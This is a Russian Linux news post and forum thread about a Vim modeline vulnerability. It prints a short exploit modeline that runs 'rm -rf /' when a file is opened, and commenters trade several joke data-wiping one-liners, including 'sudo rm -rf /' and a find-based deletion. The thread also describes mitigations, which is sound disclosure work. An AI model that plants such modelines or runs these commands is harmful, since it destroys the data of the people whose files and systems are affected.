LINUX.ORG.RU

Уязвимость в Vim


0

0

Уязвимость присутствует в версиях ниже 7.0.219.

пример эксплоита:

vim: fdm=expr fde=feedkeys("\\:![rm -rf /]<cr>")

Возможное решение: * установить последнюю версию * отключить modelines.

ссылки по теме: http://secunia.com/advisories/25024/ http://marc.info/?l=vim-dev&m=117... http://www.securitylab.ru/vulnerabili...

>>> Подробности



Проверено: Pi ()

2Модераторы, поправьте пожалуйста команду в эксплойте, а то ведь пионЭров ещё много... начнут проверять:)

UserUnknown ★★★★★
()
Ответ на: комментарий от UserUnknown

> начнут проверять:)

Да пусть. Посмотрим, научила ли их чему-нибудь строчка на перле и всё так же сидят под рутом. :)

Relan ★★★★★
()

Ну вот...и в виме уязвимости пошли... =(

pento ★★★★★
()

А на кой вим суидным делать?

anonymous
()

гг, а когда-то над MS издевались, дескать даже чтение документа может вызвать выполнение некоторого кода.

WFrag ★★★★
()

это результаты вчерашних прикручиваний пхп к виму

anonymous
()
Ответ на: комментарий от fura13

> скоро будет тема - уязвимость в bash'e : rm -rf /

В какой-то версии coreutils вроде запретили рут рм'ать =)

anonymous
()

ахха.... страшная уязвимость в линуксе: наличие комнды rm и тупых пользователей....

DemonZLa
()
Ответ на: комментарий от anonymous

> В какой-то версии coreutils вроде запретили рут рм'ать =)

да-да но ИХ это не сломит они сделают так :

cd / && for i in `ls *`; do rm -rf $i; done

а потом с пеной урта будут доказывать что линукс ахтунг а венда рулит не подеццки

fura13 ★★★
()
Ответ на: комментарий от anonymous

Уязвимость заключается в том, что при попытке открыть текстовый файл (с данным "макросом") VIM'ом (при условии, что modelines включенны), выполнится SHELL_CODE (любой)
Это может быть от банального удаления директории, до:
1. Смена пароля пользователя
2. Скачивание файла с удаленного сервера
3. Запуск скаченного файла
4. Завершение всех сессий текущего пользователя

Vim по-умолчанию не суидный. Компрометируется текущий пользователь, который запустил Vim.
Скаченным файлом может быть эксплоит, который нацелен на реализацию уязвимостей в текущей системе (ядре, сервисе и т.д.)

Так что уязвимость не то чтобы очень критичная, но по 10ти бальной шкале я бы дал ей больше 5. темболее, что большинство пользователей даже из под рута открывают файлы Vim, а в некоторых дистрибутивах он заменяет стандартный Vi.

dev0id
() автор топика
Ответ на: комментарий от dev0id

поправка: не SHELL_CODE, а SHELL_COMMAND (команда shellа)

читайте help по modelines.

пользователь реально не заметит выполнения команды.

dev0id
() автор топика
Ответ на: комментарий от dev0id

> при условии, что modelines включенны

по умолчанию они же отключены? т.е. их (или опцию compatible) надо включать в .vimrc

l07
()

Собственно а в чем новость? Как-будто никто до этого про modline не знал.

anonymous
()
Ответ на: комментарий от anonymous

> Собственно а в чем новость? Как-будто никто до этого про modline не знал.

Новость в том, что modeline не разрешает выполнение команд - по очевидным соображением. Он условно безопасен, там действует ограниченное подмножество команд vim (обычно все равно им только настройки под текущий файл подкручивают). А тут найден способ выполнить произвольную команду.

anonymous
()

Етить! А всё от чего - от того, что на РЕДАКТОР вешают примочки, которые для редактирования текста не упёрлись! Тоже мне, "вижуал-студио-для-командной-строки"!

anonymous
()
Ответ на: комментарий от dev0id

> темболее, что большинство пользователей даже из под рута открывают файлы Vim, а в некоторых дистрибутивах он заменяет стандартный Vi.

А в конфигах часто бывают макросы? Или зачем открывать на редактирование файл под рутом, если это не конфиг?

dm1024 ★★★
()
Ответ на: комментарий от anonymous

f исключает уведомления об ошибках. учите матчасть. =)

atrus ★★★★★
()
Ответ на: комментарий от anonymous

Нашли дырку? Нашли. Пофиксили? Пофиксили. Так чего теперь истерику закатывать?

anonymous
()
Ответ на: комментарий от fura13

>скоро будет тема - уязвимость в bash'e : rm -rf /

А вот и уязвимость с повышением привилегий: sudo rm -rf /

При определённых (но вполне реальных) условиях даже не спросит пароль юзера =)

MYMUR ★★★★
()
Ответ на: комментарий от vahvarh

vim сосёт, для emacs-а вирусы сто лет назад уже были, когда Microsoft Word ещё в штанах у гейца не болтался.

anonymous
()
Ответ на: комментарий от Relan

>>Да пусть. Посмотрим, научила ли их чему-нибудь строчка на перле и всё так же сидят под рутом. :)

как ты думаешь, что мне важнее - /bin, /sbin... или ~ ? :) строчки на перле могут удалить /home и это в сто раз деструктивнее, чем удаление / .

alex_custov ★★★★★
()
Ответ на: комментарий от MYMUR

зачем ёрничать? трудно признать факт наличия уязвимости?

не думаю, что все кинулись устанавливать обновления?

dev0id
() автор топика
Ответ на: комментарий от anonymous

> А всё от чего - от того, что на РЕДАКТОР вешают примочки, которые для редактирования текста не упёрлись!

Спросите об этом у емаксеров

zodiac ★★
()
Ответ на: комментарий от dev0id

>зачем ёрничать? трудно признать факт наличия уязвимости?

трудно. "это не баг, а фича" (с) :)))

AcidumIrae ★★★★★
()
Ответ на: комментарий от anonymous

ужос. срочно запрещаем ~.bashrc!!!

anonymous
()

Как вам такой сценарий: юзер хостинга кладет такой файл к себе в HOME, потом звонит в техподдержку и говорит что у него не работает скрипт, который должен работать, а пример нерабочего скрипта лежит там-то. Сотрудник ТП открывает этот файл vim'ом ....
Или еще лучше: соответствующая строчка просто кладется в crontab, потом сценарий примерно тот же

anonymous
()

Вот вам господа и популярность линуха у кухарок. Ждем AVP ругающегося в стиле "Абнаружен ихсплоит /bin/rm бла-бла-бла"

iBliss
()
Ответ на: комментарий от zodiac

>> А всё от чего - от того, что на РЕДАКТОР вешают примочки, которые для редактирования текста не упёрлись!

> Спросите об этом у емаксеров

Емакс не текстовый редактор.

stassats ★★★★
()

Ниче себе... Ждем скрипт-антивирус для vim'а? А если серьезно, то это как-то несерьзено. Думаю, такая строчка легко вылавливается (в отличии от того же МСО).

h8 ★★★
()
Ответ на: комментарий от george_root

cd /tmp; rm -rf .*

А тебе слабо "выипнецца"?

sdio ★★★★★
()
Ответ на: комментарий от stassats

да что ты? правда что-ли?

Emacs (Ема&#769;кс, Е&#769;макс, также И&#769;макс) &#8212; семейство многофункциональных расширяемых текстовых редакторов.

Emacs is the extensible, customizable, self-documenting real-time display editor.

george_root
()
Ответ на: комментарий от george_root

>Emacs (Ема&#769;кс, Е&#769;макс, также И&#769;макс) &#8212; семейство многофункциональных расширяемых текстовых редакторов.

Знаешь, десктоп с жабер/постовым/ирц-клиентом, файловым менеджером, редактором картинок, ..., ..., ..., ..., ..., трудно назвать "расширяемым текстовым редактором". )))

h8 ★★★
()
Ответ на: комментарий от UserUnknown

>2Модераторы, поправьте пожалуйста команду в эксплойте, а то ведь пионЭров ещё много... начнут проверять:)

Когда новость увидел первая мысль такая же была, но потом отпустило.., _ведь в Линукс главное правтика.._ :))

dragon_djanic ★★
()
Ответ на: комментарий от george_root

> кто еще выипнецца способом вытереть корень?
sudo find / -type d -iname "*" -exec rm -rf {} \; 2> /dev/null

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.